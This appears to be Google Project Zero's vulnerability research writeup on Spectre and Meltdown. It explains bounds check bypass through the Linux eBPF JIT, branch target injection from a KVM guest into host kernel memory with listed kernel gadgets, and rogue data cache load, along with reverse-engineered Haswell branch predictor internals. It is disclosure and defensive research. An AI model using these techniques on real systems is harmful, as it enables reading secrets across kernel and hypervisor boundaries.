During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 — 2);
 *bhb_state ^= (src & 0xc000) >> (14 — 4);
 *bhb_state ^= (src & 0x30) << (6 — 4);
 *bhb_state ^= (src & 0x300) << (8 — 8);
 *bhb_state ^= (src & 0x3000) >> (12 — 10);
 *bhb_state ^= (src & 0x30000) >> (16 — 12);
 *bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

